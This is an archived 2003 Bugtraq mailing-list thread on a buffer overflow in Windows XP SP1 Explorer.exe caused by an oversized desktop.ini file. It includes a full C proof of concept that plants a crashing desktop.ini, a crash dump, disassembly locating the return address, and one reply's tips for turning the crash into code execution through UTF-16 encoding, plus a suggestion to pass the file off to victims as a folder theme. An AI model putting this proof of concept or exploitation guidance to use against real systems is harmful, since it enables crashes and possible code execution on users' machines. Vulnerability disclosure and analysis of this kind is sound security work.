Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1
From: nesumin <nesumin () softhome net>
Date: Wed, 14 May 2003 20:27:24 +0900

Hello,

Due to the size limitation set by the 800H as well as the fact that the
overflowing string is converted to Unicode, the chance for executing a
malicious code (Unicode exploit code as well as exploitable RET address) is
very limited. That is the reason we are documenting it in details here.

I could create the exploit code on my Japanese Windows XP SP1.
Perhaps, I think you can easily create the full exploit code
by the following;

* You can directly specify all overwritten data without thinking
  the UNICODE conversion if you create the "desktop.ini" as "UTF-16".
  (Adding BOM and encoding "[.ShellClassInfo]\x0d\x0a".)

* You can get the code area of about 0xFF4 bytes.
  (Before and after RET address)


Best Regards.

---------------------------------
nesumin <nesumin () softhome net>


-----Original Message-----
From: "Executable Security" <exurity () rogers com>
Sent: Sun, 11 May 2003 03:28:54 -0500
To: <bugtraq () securityfocus com>
Subject: Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1


Hi, there:

We were able to duplicate what was reported by Kristopher Matthews and aT4r
InsaN3. Actually, if you have the following test scenario:

File/Dir                              Explanation
C:\
C:\temp\desktop.ini           Overflowing text file
C:\test                               directory

The c:\temp\desktop.ini is the buffer-overflowing text file. Then, it
crashes not only Explorer.exe, but also Internet Explorer.exe, and
application programs (it crashed UltraEdit) that use file-open dialog box
trying to scan the c:\ hard drive. However, you can do the following safely
from a DOS prompt for the directory c:\test

Explorer c:\test

Of course, you cannot browse C:\test from the Explorer.exe GUI starting with
C:\ root directory because of the overflowing c:\temp\desktop.ini file.
Actually, I assume the overflowing file, no matter where it is located in
the subdirectory, will crash the Explorer.exe starting with any directory
higher above the overflowing desktop.ini file. (did not fully test though).

Down to the assembly level, this bug lies in the shell32.dll file as such:

7740F3C3                 lea     eax, [ebp-21Ch]              ; full path to the
filename \desktop.in
7740F3C9                 push    eax
7740F3CA                 push    800h                 ; should be 400h I believe
7740F3CF                 lea     eax, [ebp-0A1Ch]
7740F3D5                 push    eax
7740F3D6                 push    offset a_shellclassinf ; ".ShellClassInfo"
7740F3DB                 call    ds:GetPrivateProfileSectionW

When GetPrivateProfileSectionW is called, it assumes the buffer to be as
large as two times of 800h. As you can see, the local buffer is only A1C -
21C = 800H for this string. So, it overflows if the desktop.ini contains a
long string. MSDN documents the third parameter for GetPrivateProfileSection
as such:

nSize
Specifies the size, in characters, of the buffer pointed to by the
lpReturnedString parameter.

To be precise, the buffer overflowing structure for this bug is such:

| --------------------- A1C ---------| EBP | RET | -----------------> higher
address

The replaceable RET address is located at (A1C+4)/2 = 510.

Due to the size limitation set by the 800H as well as the fact that the
overflowing string is converted to Unicode, the chance for executing a
malicious code (Unicode exploit code as well as exploitable RET address) is
very limited. That is the reason we are documenting it in details here.

We do not know how this bug affects shell32.dll files on other Windows
versions.

With due credits to those who wrote the emails quoted below.

Peter Huang
http://members.rogers.com/exurity/

-----Original Message-----
From: Kristopher Matthews [mailto:krism () mailsnare net]
Sent: Friday, May 09, 2003 11:43 AM
To: 'Ryan Yagatich'
Cc: vuln-dev () securityfocus com
Subject: RE: Buffer overflow in Explorer.exe

I have tested and duplicated this behavior on a fully patched/updated
Windows XP Pro system.

1. The overflow is for that particular key, AFAICT.
1a. It will not work for the root (c:/) directory; explorer.exe does not
parse 'desktop.ini' for that directory. It will, however, work for any other
directory.
2. It crashes explorer.exe (which runs the task bar/start menu, etc) - It
looks for all the world like a standard buffer overflow; I believe a more
carefully crafted 'desktop.ini' file could be cause for explorer.exe to
unintentionally execute arbitrary code.
3. Download and execute untrusted code? Combine this with any of the other
popular expoloits for windows; also, it wouldn't be terribly hard to get a
user to download a 'desktop.ini' file to their "My Documents" directory (in
the guise, of, say, a folder them, which windows does support; e.g.
different background, file layout, etc); bam, whenever they open that
directory, explorer crashes.

Regards,
Kristopher


-----Original Message-----
From: Ryan Yagatich [mailto:ryany () pantek com]
Sent: Thursday, May 08, 2003 6:28 PM
To: at4r () 3wdesign es
Cc: vuln-dev () securityfocus com

Hi,
        I don't quite understand the purpose behind this code. It creates
a read only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the
contents of

[.ShellClassInfo]
AAAAAAAAAAAA {x2301}


        And then terminates? I don't have a windows machine available to
really explore this any, but what makes that entry in desktop.ini cause
this? Furthermore, is this issue only for that particular key or is it
generally just key/excessive parameter/missing value size that is
affected? And additionally, you mention that explorer will no longer be
able to operate when trying to browse the hard disk, but does this mean
globally, or when they try to browse the c:/ drive, or just that
particular folder?
        Please send me more information about this, (even if it references
past posts that I have missed) so that I can better understand the
severity of this. Espcially since to me, I still see it as someone needing
to download and execute untrusted software which causes a system crash,
and if that were going to happen there are far worse things that can be
done besides creating a small text file.

Thanks,
Ryan Yagatich


,_____________________________________________________,
\ Ryan Yagatich                     support () pantek com \
/ Pantek Incorporated                  (877) LINUX-FIX /
\ http://www.pantek.com/security        (440) 519-1802 \
/       Are your networks secure? Are you certain?     /
\___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\

On Wed, 7 May 2003, aT4r InsaN3 wrote:

This bug allow a malicious an attacker to execute data with privileges of a

user that is browsing the hard disk with explorer.

tested against winxp SP1

example code provided.

<snip>

      strcpy(path,"\\aT4r[at]3WDesign.es Security");
      mkdir(path);
      SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);

      strcat(path,"\\desktop.ini");

      bof=fopen(path,"w");
      fputs("[.ShellClassInfo]\n",bof);
      memset(evil,'A',BUFF);
      fputs(evil,bof);
      fclose(bof);
<snip>

-----Original Message-----
From: aT4r InsaN3 [mailto:at4r () hotmail com]
Sent: Wednesday, May 07, 2003 3:54 PM
To: vuln-dev () securityfocus com
Subject: Buffer overflow in Explorer.exe

This bug allow a malicious an attacker to execute data with privileges of a
user that is browsing the hard disk with explorer.

tested against winxp SP1

example code provided.


/*

        Buffer Overflow in explorer.exe - Proof of Concept
        Tested only against: Windows XP SP1

        Found by aT4r () 3wdesign es

        Saludos a:
        - #Haxorcitos () efnet= { "Tarako", "Croulder", "Drakar" , "[back]",
"tyr" }:
        - #localhost and #darknet


        Usage: just execute this file.
                This code will crash your explorer every time you try to
browse your
harddisk
                execute this program again to delete the evil file ;-)

        (3ec.464): Access violation - code c0000005 (first chance)
        First chance exceptions are reported before any exception handling.
        This exception may be expected and handled.
        eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70
edi=000ece90
        eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0         nv up ei pl zr
na po
nc
        cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
efl=00010246
        00410041 ??               ???

        3W Design Security 2003.        http://www.3WDesign.es/
*/


#include <direct.h>
#include <stdio.h>
#include <windows.h>
#include <sys/stat.h>

#define BUFF 2300
void main(){

        char path[256];
        char evil[BUFF+1]="";
        FILE *bof;
        struct stat st;
        printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... ..
.\n . ..
...: \tProof of Concept (aT4r () 3wdesign es)\t:... .. .\n\n");
        strcpy(path,"\\aT4r[at]3WDesign.es Security");
        mkdir(path);
        SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);

        strcat(path,"\\desktop.ini");
        if (stat(path,&st)==0)
                { remove(path); exit(1);}//just execute this program twice
to remote this
file :P
        bof=fopen(path,"w");
        fputs("[.ShellClassInfo]\n",bof);
        memset(evil,'A',BUFF);
        fputs(evil,bof);
        fclose(bof);
        printf("evil file: %s Created. Try to browse your Harddisk
O:-)\n",path);


}

_________________________________________________________________
Hipotecas para todos los bolsillos con MSN Money.
http://money.msn.es/hipotecas/default.asp


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault